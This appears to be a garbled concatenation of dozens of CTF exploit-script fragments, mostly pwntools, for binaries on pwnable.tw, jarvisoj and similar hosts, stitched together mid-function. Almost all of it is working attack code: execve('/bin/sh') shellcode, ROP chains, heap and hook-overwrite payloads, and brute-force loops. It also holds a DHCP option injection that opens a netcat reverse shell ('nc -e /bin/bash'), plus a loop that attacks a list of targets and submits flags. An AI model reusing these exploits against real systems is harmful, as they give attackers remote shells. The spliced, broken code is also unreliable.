def launch_pwn(attack_network, gdb_server):
p = None
if attack_network:
p = remote(HOST, PORT)
else:
fileparams = FILE
if gdb_server:
fileparams = ['/usr/bin/gdbserver', 'localhost:%d' % GDBPORT, FILE]
p = process(fileparams)
try:
pwn(p)
except e:
#TODO, real exception handling or something
print('Exception ocurred: %s' % str(e))
p.clean_and_log()
def pwn_violately(): leak = True system_addr = 0x0 while leak == True: io = get_io(target, local = local) system_addr = leak_addr(io) if system_addr > 0: leak = False io.kill() while True: try: io = get_io(target, local = local) pwn(io, system_addr) except Exception, e: pass else: pass finally:
def launch_pwn(attack_network, gdb_server, strace):
p = None
if attack_network:
p = remote(HOST, PORT)
else:
if gdb_server:
fileparams = ['/usr/bin/gdbserver', 'localhost:%d' % GDBPORT, FILE]
elif strace:
fileparams = ['/usr/bin/strace', FILE]
else:
fileparams = [FILE]
for arg in F_PARAM:
fileparams.append(arg)
p = process(fileparams)
try:
pwn(p)
except Exception as e:
#TODO, real exception handling or something
print('Exception ocurred: %s' % str(e))
p.clean_and_log()
raise e
p.clean_and_log()
shellcode_asm = shellcode_asm%asm_info
print shellcode_asm
print repr(asm(shellcode_asm))
print asm(shellcode_asm).find("\x00")
shellcode_bin = asm(shellcode_asm)
#shellcode_bin = '\xb8\x01\x01\x01\x015\x01\x01\x01\x01\xff\xc0H1\xd2\x80\xf2\x0cH1\xff\x81\xf7Q\x80a\x01\x81\xf7\x01\x01\x01\x01\x8b?H1\xf6\x81\xf6\xf6\x07A\x01\x81\xf6\x01\x01\x01\x01\x0f\x05H\xb8ogn/uyu\x01P\x814$\x01\x01\x01\x01\x81t$\x04\x01\x01\x01\x01H\xb8/.udru/hP\x814$\x01\x01\x01\x01\x81t$\x04\x01\x01\x01\x01H\x89\xe7H1\xf6H1\xc0\xff\xc0\xff\xc0\x0f\x05H\x89\xc7H1\xf6\x81\xf6\xa1\x80a\x01\x81\xf6\x01\x01\x01\x01H1\xc0\x0f\x05H1\xff\x81\xf7Q\x80a\x01\x81\xf7\x01\x01\x01\x01\x8b?H1\xd2\x80\xf2@H1\xc0H\xff\xc0\x0f\x05'
#exit(0)
#heap_addr = 0x7f6bec000000
heap_addr = 0x0
if heap_addr == 0:
while True:
io = get_io(target)
heap_addr = leak_addr(io)
io.close()
if heap_addr & 0xff0000000000 == 0x7f0000000000:
break
print hex(heap_addr)
ret_addr = heap_addr + 0x011110
#raw_input(":")
while True:
try:
io = get_io(target)
flag = pwn(io, ret_addr, shellcode_bin)
print "get it"
break
except Exception as e:
ret_addr += 0x1000
io.close()
raw_input(":")
## file: exp for note
## date: 2018-04-19
## author: raycp
from pwn import *
from ctypes import *
DEBUG = 1
if DEBUG:
#p1 = process('./note')
p = remote('127.0.0.1', 1234)
#scontext.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#p = process(['./babystack.dms'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc_64.so.6')})
#libc = ELF('libc_64.so.6')
else:
p = remote(
'chall.pwnable.tw',
10205,
)
libc = ELF('libc_64.so.6')
#context.log_level = 'debug'
wordSz = 4
hwordSz = 2
bits = 32
PIE = 0
mypid = 0
def leak(address, size):
with open('/proc/%s/mem' % mypid) as mem:
mem.seek(address)
return mem.read(size)
s.send(dat)
s.send("\x50\x00\x00\x00")
s.send("\x03\x00\x00\x00")
s.send("\x00"*(8+8+8)+p64(8)+p64(free_hook)+"\x01")
raw_input('')
dat = data(0x18, 0x00, 0x05)
s.send(dat)
dat = data(0x02,0x08,0x05)
s.send(dat)
dat = data(0x01,0xff,0x03)
s.send(dat)
s.send(p64(system))
time.sleep(1)
raw_input('eof')
dat = data(0x05,0x00,0x00)
s.send(dat)
s.send("\x00\x00\x00\x00")
p.success("Get Shell")
p = log.progress("eagle")
libc_Base = libc_leak(p)
#heap_Base, top_Chunk= heap_leak(p)
system = libc_Base + 0x46590
free_hook = libc_Base + 0x3c0a10
log.info("free_hook : " + hex(free_hook))
log.info("system : " + hex(system))
pwn(free_hook, system,p)
p.sendline(asm(shellcode))
try:
time = 0
for i in range(5):
p.sendline('')
time = i
sleep(0.1)
p.close()
except Exception as e:
time = i
p.close()
if time > 3:
return True
return False
def pwn(flag):
for i in range(30, 50):
for j in string.printable:
if check(i, ord(j)) == True:
if j == '}':
return True
flag += j
print flag
break
p.interactive()
flag = ''
pwn(flag)
print flag
delete()
add(0x40, "\x10\x70")
add(0x40, "")
add(0x40, p64(0) * 4 + p64(0x0000000007000000))
delete()
add(0x40, "")
add(0x18, p16(0x2760))
#Debug()
payload = ""
payload += p64(
0xfbad3c80
) #_flags= ((stdout->flags & ~ _IO_NO_WRITES)|_IO_CURRENTLY_PUTTING)|_IO_IS_APPENDING
payload += p64(0) #_IO_read_ptr
payload += p64(0) #_IO_read_end
payload += p64(0) #_IO_read_base
payload += "\x08" # overwrite last byte of _IO_write_base to point to libc address
add(0x38, payload)
libc.address = u64(p.recv(6) + '\x00\x00') - 0x3ed8b0
success("libc.address-->" + hex(libc.address))
add(0x18, p64(0) + p64(libc.sym["__free_hook"] - 8))
add(0x7f, "/bin/sh\x00" + p64(libc.sym["system"]))
delete()
p.interactive()
while True:
try:
p = bin.process(env={"LD_PRELOAD": libc.path})
pwn(p)
except Exception as e:
p.close()
exit(0) ''' '-'*13 -- c ''.rjust(61, '-') '-'*15 try ''.rjust(63, '-') '-'*12 -- co rjust(60, '-') '-'*14 -- ctry 'y'.rjust(63, '-') ''' cookie = '' for index in range(62)[::-1]: real = pwn( '-' * index)[: 128] for i in '1234567890abcdefghijklmnopqrstuvwxyz-_': now = pwn( cookie.rjust(63, '-') + i)[: 128] if now == real: cookie += i print cookie print len(cookie) break exit(0) i = -1 while True: i += 1
## file: exp for gamebox
## date: 2018-04-26
## author: raycp
from pwn import *
from ctypes import *
DEBUG = 1
if DEBUG:
p = process('./GameBox')
#scontext.log_level = 'debug'
#libc = ELF('/lib32/libc-2.24.so')
#p = process(['./babystack.dms'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc_64.so.6')})
lib = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
p = remote('39.107.33.43', 13570)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#libc = ELF('libc_64.so.6')
#context.log_level = 'debug'
wordSz = 4
hwordSz = 2
bits = 32
PIE = 0
mypid = 0
def leak(address, size):
with open('/proc/%s/mem' % mypid) as mem:
mem.seek(address)
return mem.read(size)
def findModuleBase(pid, mem):
name = os.readlink('/proc/%s/exe' % pid)
def pwn_remote():
session = ssh("yeet", "ctf.kaf.sh", password="******", port=7030)
conn = session.run("1")
conn.read()
pwn(conn)
add2(0x68, p64(0) + p64(0x111))
free2(7)
add2(0x108, p64(0) * 11 + p64(0x71) + p64(stdin_hook - 0x28))
add2(0x68, 'flag')
pop_rdi_ret = libcbase_addr + libc.search(asm("pop rdi\nret")).next()
pop_rsi_ret = libcbase_addr + libc.search(asm("pop rsi\nret")).next()
pop_rdx_ret = libcbase_addr + libc.search(asm("pop rdx\nret")).next()
open_addr = libcbase_addr + libc.symbols["open"]
read_addr = libcbase_addr + libc.symbols["read"]
puts_addr = libcbase_addr + libc.symbols["write"]
orw = p64(pop_rdi_ret) + p64(heap_addr + 0x50) + p64(pop_rsi_ret) + p64(
72) + p64(open_addr)
orw += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(
heap_addr + 0x12a8) + p64(pop_rdx_ret) + p64(0x30) + p64(read_addr)
orw += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(
heap_addr + 0x12a8) + p64(pop_rdx_ret) + p64(0x100) + p64(puts_addr)
payload = p64(0) + p64(libcbase_addr + libc.symbols["_IO_wfile_jumps"]
) + p64(0) + p64(0xfbad1800) + p64(0) * 6 + p64(
stack_addr) + p64(stack_addr + 0x100)
print "heap_addr=", hex(heap_addr)
print "len=", hex(len(payload))
print "stack_addr=", hex(stack_addr)
edit(stdin_hook - 0x20, '\x7f')
add2(0x68, payload)
p.sendlineafter("> ", "5\n" + orw)
p.interactive()
if __name__ == '__main__':
pwn('39.105.231.146', 10016, 1)
def pwn_local():
conn = process(['./CloneWarS'])
pwn(conn)
def pwn_local():
conn = process(['./CookShow'])
pwn(conn)
def get_flag(host, port):
return pwn(host, port, 0)
except-interface=lo
dhcp-range={start},{end},22h
dhcp-option=3,{ip}
dhcp-option=6,{ip}
log-queries
log-facility=/var/log/dnsmasq.log
'''.format(ip=ip, start=start, end=end)
f.write(dnsmasq)
f.close()
cm = []
cm.append('ifconfig eth0 {ip} netmask 255.255.255.0 '.format(ip=ip))
cm.append('route add default gw {ip}'.format(ip=ip))
cm.append(
'''dnsmasq -dC dnsmasq.conf --dhcp-option="252,'&nc -e /bin/bash {ip} {port} #"'''.format(ip=ip, port=port))
q = process('bash')
for i in range(len(cm) - 1):
q.sendline(cm[i])
time.sleep(1)
# time.sleep(100)
p = process('bash')
p.sendline('nc -l -p {port} -v'.format(port=port))
q.sendline(cm[-1])
time.sleep(3)
p.interactive()
# q.interactive()
if __name__ == '__main__':
pwn(ip, port)
# coding = utf8
from pwn import *
from zio import *
target = ('120.27.130.77', 9000)
def get_io(target):
r_m = COLORED(RAW, "green")
w_m = COLORED(RAW, "blue")
io = zio(target, timeout=9999, print_read=r_m, print_write=w_m)
return io
def pwn(io):
context(arch='i386', os='linux', log_level='debug')
payload = asm("pop edx;mov dl,0xcf;jmp edx;")
payload2 = asm(pwnlib.shellcraft.i386.linux.sh())
io.gdb_hint()
io.writeline(payload)
print disasm(payload2)
shellcode = payload2.ljust(4090, 'a')
shellcode += shellcode[:5]
io.writeline(shellcode)
io.interact()
pwn(get_io(target))
# Jump into main... Just for the hell of it.
main = address + 0xead
#0x4b98
stack_pivot = address + 0x3f87
print "Address of stack pivot...", hex(stack_pivot)
for i in range(4):
# Bit manipulations in order to get the bits from the address that we want.
cur_byte = stack_pivot & 0xff << (i * 8)
cur_byte = cur_byte >> (i * 8)
program_code = "0x0049" + hex(cur_byte)[2:] + "53"
codes.append(int(program_code, 16))
'''
codes.append(0x00494153)
codes.append(0x00494153)
codes.append(0x00494153)
codes.append(0x00494153)
'''
defeat_checksum(codes)
heap_val = heap_leak()
defeat_random(heap_val)
keyauth_one_defeat()
keyauth_two_and_three_defeat()
pwn(heap_val)
p.sendline('cat /home/project2_priv/.pass')
p.interactive()
31 c9 xor ecx, ecx ; initialize
f7 e1 mul ecx
51 push ecx
68 2f 2f 73 68 push 0x68732f2f68
68 2f 62 69 6e push 0x6e69622f68
89 e3 mov ebx, esp ; execute address
b0 0b mov a1, 0xb ; system_execve()
cd 80 int 0x80 ; Linux system call interrupt
"""
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
def leak():
recv = s.recvuntil(':')
print recv
payload = 'a'*20 + addr1
s.send(payload)
print 'send:' + payload
stackAddr = s.recv(4)
print 'stack address is : ' + stackAddr
return u32(stackAddr)
def pwn(addr):
payload = 'a'*20 + p32(addr+20) + '\x90'*10 + shellcode
s.send(payload)
print 'send : ' + payload
addr2 = leak()
pwn(addr2)
s.interactive()
ebp_addr = 'a' * 8
shellcode = ""
#dup 0
shellcode += l64(pop_rdi_addr) + l64(6)
shellcode += l64(pop_rsi_r15_addr) + l64(0) + l64(1)
shellcode += l64(dup2_addr)# + ebp_addr
#dup 1
shellcode += l64(pop_rdi_addr) + l64(6)
shellcode += l64(pop_rsi_r15_addr) + l64(1) + l64(1)
shellcode += l64(dup2_addr)# + ebp_addr
#dup 2
shellcode += l64(pop_rdi_addr) + l64(6)
shellcode += l64(pop_rsi_r15_addr) + l64(2) + l64(1)
shellcode += l64(dup2_addr)# + ebp_addr
#call system binstr
shellcode += l64(pop_rdi_addr) + l64(binstr_addr)
shellcode += l64(system_addr)
pay_load = 'a' * stack_len + ebp_addr + shellcode
io.write(pay_load + "\n")
io.interact()
#target = ('127.0.0.1', 36184)
pwn(target)
#get_addr(target)
pwn3(target)
## file: exp for opm
## date: 2018-04-11
## author: raycp
from pwn import *
from ctypes import *
DEBUG = 1
if DEBUG:
p = process('./opm')
#scontext.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#p = process(['./babystack.dms'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc_64.so.6')})
#libc = ELF('libc_64.so.6')
else:
p = remote(
'chall.pwnable.tw',
10205,
)
libc = ELF('libc_64.so.6')
#context.log_level = 'debug'
wordSz = 4
hwordSz = 2
bits = 32
PIE = 0
mypid = 0
def leak(address, size):
with open('/proc/%s/mem' % mypid) as mem:
mem.seek(address)
return mem.read(size)
payload += mov
payload += pop2ret
payload += p32(data + 4)
payload += cmd[4:8]
payload += mov
payload += pop2ret
payload += p32(data + 8)
payload += cmd[8:]
payload += mov
payload += sys
payload += p32(data)
r.sendline(payload)
r.interactive()
pwn()
'''
BUT!
You could spawn a shell a lot easier by just returning to libc
Example:
from pwn import *
def pwn():
r = process('./write432')
junk = "A"*44
sys = p32(0xf7e31da0)
exit = p32(0xf7e259d0)
bin_sh = p32(0xf7f52a0b)
payload = junk + sys + exit + bin_sh
r.sendline(payload)
# The vulnerable server.
server = remote("chall.pwnable.tw", 10000)
addr_1 = p32(0x08048087)
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
def leak():
payload = "a" * 20 + addr_1
recv = server.recvuntil(':')
server.send(payload)
stack_addr = server.recv(4)
print "Address of stack: " + hex(u32(stack_addr))
return u32(stack_addr)
def pwn(addr):
payload = 'a' * 20 + p32(addr+20) + sc
server.send(payload)
stack_addr = leak()
pwn(stack_addr)
server.interactive()
def main(args):
print "kioptrix level 1.1 automatic exploitation utility."
if len(args) != 3:
sys.exit("use: %s target_ip my_ip" % (args[0]))
pwn(target=args[1], my_ip=args[2])
shellcode = '''
push eax
pop ebx
pop eax
pop eax
push edx
push 0x40
pop edx
sub al,0x2e
sub byte ptr[eax + 0x23] , dl
sub byte ptr[eax + 0x23] , dl
push 0x33
pop edx
sub byte ptr[eax + 0x22] , dl
pop edx
push 0x6b
pop eax
sub al,0x60
'''
shellcode = asm(shellcode)
p = process("./death_note")
#p=remote("chall.pwnable.tw",10201)
#gdb.attach(p,'b *0x8048873')
context.log_level = 'debug'
add(pwn(0x804a014), shellcode + "\n")
add(1, "/bin/sh\n")
free(1)
p.interactive()
def main():
while 1:
# s = process('./start_hard')
s = remote('128.199.152.175', 10001)
pwn(s)
ip = '159.89.1.177' # change this
port = 4001 # change this
fname = './shelly' # change this
LOCAL = False
if LOCAL:
r = process(fname)
else:
r = remote(ip, port)
ru = lambda x: r.recvuntil(x)
inter = lambda: r.interactive()
sla = lambda x, y: r.sendlineafter(x, y)
def pwn():
sla(':', '1')
sla(':', 'w3t')
sc = b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'
ru('0x')[:-2]
leaked = int(ru(']')[:-1], 16)
print('Leaked: 0x{:x}'.format(leaked))
payload = sc.ljust(72, b'\x90') + p64(leaked)
sla(':', payload)
inter()
if __name__ == '__main__':
pwn()
create(
'c', 'a', 0x38, 'a' * 8 + p32(0) + p32(0x31) + 'a' * 8 + p32(0) +
p32(0x21) + p32(fake_fastbin))
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(
heap_addr + 0x1430) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
edit('b', 2, (str(0x18), 'a' * 8))
#control main_arena->top
print 'malloc_hook is', hex(malloc_hook)
create('d', 'a', 0x18, 'a' * 20 + p32(malloc_hook - 0x8))
edit('a', 2, (str(0x70), p32(system_addr)))
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(
heap_addr + 0x1440) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
#gdb.attach(p, open('debug'))
#call malloc('/bin/sh') which equals to system('/bin/sh')
edit('b', 2, (str(bin_sh), p32(system_addr)), True)
if getshell:
p.interactive()
else:
run(p, "./backdoor")
if __name__ == '__main__':
pwn('127.0.0.1', getshell=False)
free(1)
free(3)
payload = p32(0x0) + p32(0x81) + p32(heap_base + 0x18 - 12) + p32(heap_base + 0x18 - 8) + p32(0x80) #chunk0
payload = payload.ljust(0x80,"6")
payload += p32(0x80) + p32(0x80) #chunk1
payload = payload.ljust(256,"9")
payload += p32(0x80) + p32(0x81) #chunk2
add(len(payload),payload)
free(1)
payload = "a"*20
add(len(payload),payload)
showlist()
system_addr = libc + lib.symbols['system']
binsh_addr = libc + next(lib.search("/bin/sh\x00"))
add(0x50,0x50*"a")
payload = "\x250\x00\x00" + p32(1)+p32(0x4) + p32(elf.got['free']) + p32(1) + p32(0x14) + p32(heap_base+0xc280) + p32(1) + p32(0x8) + p32(heap_base + 0xda8) + p32(0) + p32(heap_base + 0xB80) + p32(0)
payload = payload.ljust(0x108,"\x00")
edit(0,0x108,payload)
edit(0,4,p32(system_addr))
edit(2,8,"/bin/sh\x00")
showlist()
free(2)
log.success("libc: " + hex(libc))
log.success("heap_base: " + hex(heap_base))
log.success("system_addr: " + hex(system_addr))
log.success("binsh_addr: " + hex(binsh_addr))
sh.interactive()
if __name__ == "__main__":
#nc pwn2.jarvisoj.com 9885
pwn("pwn2.jarvisoj.com",9885,0)
overwrite_notetable(heap_addr)
edit_note(0, p64(0x100) + p64(1) + p64(0x8) + p64(atoi_got) + "a" * (0x300 - 32), 0x300)
system_addr = libc_addr - 3672200
edit_note(0, p64(system_addr), 8)
#get shell
ru(': ')
sl('/bin/sh')
io.interactive()
if __name__ == '__main__':
global io
if DEBUG:
io = process('./freenote')
#io = remote('127.0.0.1', 4000)
pause()
pwn()
else:
f = open(sys.argv[1], 'r')
targets = f.readlines()
for target in targets:
io = remote(target, int(sys.argv[2]))
resp = pwn()
sendflag(resp)
exit(0)
payload += call_func(
elf.got['read'], address_of_page, page_size, rwx
) # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7);
payload += p64(shellcode_addr)
p.send(payload.ljust(0x400, '\x00'))
#sleep(1)
p.send(shellcode.ljust(0x40, '\x00'))
p.sendline(read_ow)
p.send('ls\n')
#print p.recvline()
if p.recvline(): #if succeed, it will recv, else return.
p.interactive()
else:
p.close()
#print 'ee'
return
if __name__ == '__main__':
#pwn(0x9e)
for i in range(0, 256): #brute the last byte.
print i
try:
pwn(i)
except:
pass
##ASIS{n0_exec_stack_slapped_ma_f4c3_hehe_____}
shellcode += "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
io.send(shellcode + "\n")
print io.recvuntil("> ")
io.send("3\n")
print io.recvuntil("\n")
io.send("nihaoa\n")
print io.recvuntil("\n")
#addr = int(raw_input("name_addr:"), 16)
#search_heap(io, addr)
name_addr = leak_heap(io, 10) - 0x20
print io.recvuntil("> ")
io.send("4\n")
print io.recvuntil("n)")
print io.send("n\n")
print io.recvuntil("> ")
io.send("3\n")
print io.recvuntil("\n")
call_addr = p64(name_addr)
io.send(call_addr * 4)
io.interactive()
io = get_io(target, local=local)
pwn(io)
shellcode_list.append("%02x"%((ord(c) ^ opcode2)&0xff))
else:
shellcode_list.append("%02x"%((ord(c) ^ opcode1)&0xff))
shellcode = "".join(shellcode_list)
payload += shellcode + "00"
print payload
if fromfile == True:
file_w = open("exp.dat", 'w')
file_w.write(payload + "\n")
file_w.close
else:
io.write(payload + "\n")
io.interact()
#data = run_cmd("objdump -d -M x86-64 binary1_3\n")
#print get_info(data)
#exit(0)
"""
#local
target = "./binary1"
io = get_io(target)
pwn(io, fromfile = True)
"""
#remote
io = get_io(target)
pwn(io, fromfile = False)
def get_io(target):
ELF("./precision")
io = zio(target, timeout = 9999, print_read = COLORED(RAW, 'green'), print_write = COLORED(RAW, 'blue'))
return io
def pwn(io):
io.read_until("Buff: ")
stack_addr_str = io.read_until("\n")
stack_addr = int(stack_addr_str, 16)
print "stack_addr:", hex(stack_addr)
print "cmp_val_addr", hex(stack_addr + 0x80)
cmp_value = l64(0x40501555475a31a5)
ebp = l32(0x00)
ret_addr = l32(stack_addr)
shellcode = "\xb0\x46\x31\xc0\xcd\x80\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\x31\xc9\xe8\xf2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
shellcode = "\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87";
print disasm(shellcode)
payload = shellcode.ljust(0x80, '\x90') + cmp_value + 'a' * 8 + ebp + ret_addr
io.gdb_hint()
io.write(payload + "\n")
io.interact()
io = get_io(target)
pwn(io)
from pwn import *
server = remote("chall.pwnable.tw", 10000)
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
addr_1 = p32(0x08048087)
def leak():
payload = 'a' * 20 + addr_1
recv = server.recvuntil(':')
server.send(payload)
stack_addr = server.recv(4)
print(stack_addr)
#0x804809d
print("Address of stack: " + hex(u32(stack_addr)))
return u32(stack_addr)
def pwn(addr):
payload = 'a' * 20 + p32(addr + 20) + sc
server.send(payload)
addr_2 = leak()
pwn(addr_2)
server.interactive()
libc_base = u64( view( 0 )[-8:] ) - unsorted_libc
heap_base = u64( view( 0 )[:8] )
realloc_hook = libc_base + realloc_hook_libc
global_max_fast = libc_base + global_m_fast_libc
excve_sh = libc_base + excve_sh_libc
entry_head = libc_base + pie_off + 0x203060
log.info('&global_max_fast='+hex(global_max_fast))
log.info('&heap_base='+hex(heap_base))
log.info('&entry_head='+hex(entry_head + 5 *24 ))
insert( 'a' * 8 )
update( 0, 'a'*8 + p64( global_max_fast - 0x10 ) )
insert( 'b' * 8 )
merge( 4 , 4 )
update( 8 , p64( entry_head + 5*8*3 ) * 2 )
insert( '1' * 8 )#这次分配还是在entry4的位置,下次就可以分配到伪造的entry_head上面去
insert( 'x' * 120 )
rand_key = u64 ( view( 9 ) [96:96+8] ) ^ ( entry_head + 5*8*3 )#泄漏出rand_key,
print hex( rand_key )
payload = 'a' * 8 + p64 ( 1 ) + p64( 8 ) + p64( ( realloc_hook + 0x30 ) ^ rand_key ) #计算出要改写的realloc_hook的偏移
update ( 9 , payload )
update ( 6 , p64( excve_sh ) )#把realloc_hook改成libc中执行system(/bin/sh)的地方
p.sendlineafter ( 'Your choice: ' , '2' )
p.sendlineafter ( 'Entry ID: ' , '0' )
p.sendlineafter ( 'Length of entry: ' , '1314' )#触发realloc
p.interactive()
if __name__ == '__main__' :
pwn()
if index & 1 == 1:
shellcode_list.append("%02x" % ((ord(c) ^ opcode2) & 0xff))
else:
shellcode_list.append("%02x" % ((ord(c) ^ opcode1) & 0xff))
shellcode = "".join(shellcode_list)
payload += shellcode + "00"
print payload
if fromfile == True:
file_w = open("exp.dat", 'w')
file_w.write(payload + "\n")
file_w.close
else:
io.write(payload + "\n")
io.interact()
#data = run_cmd("objdump -d -M x86-64 binary1_3\n")
#print get_info(data)
#exit(0)
"""
#local
target = "./binary1"
io = get_io(target)
pwn(io, fromfile = True)
"""
#remote
io = get_io(target)
pwn(io, fromfile=False)
